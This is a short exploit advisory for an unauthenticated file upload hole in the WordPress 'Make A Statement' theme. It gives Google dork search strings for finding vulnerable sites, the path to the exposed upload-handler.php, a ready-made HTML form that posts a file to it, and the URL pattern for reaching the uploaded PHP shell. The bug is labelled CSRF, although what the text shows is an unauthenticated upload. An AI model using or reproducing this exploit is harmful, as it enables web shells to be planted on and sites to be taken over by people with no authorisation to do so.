#标题 : Wordpress Make A Statement Themes CSRF File Upload Vulnerability #作者 : DevilScreaM #类型 : Web Applications #Type : PHP #影响版本 : 1.x.x #官网 : http://themes.mas.gambit.ph/ #测试环境: Mozila, Chrome, Opera -> Windows & Linux #缺陷类型 : CSRF #关键词 : inurl:wp-content/themes/make_a_statement inurl:wp-content/themes/make_a_statement_v1 CSRF 文件上传缺陷 Exploit & POC : http://site-target/wp-content/themes/make_a_statement/library/includes/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/make_a_statement/library/includes/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php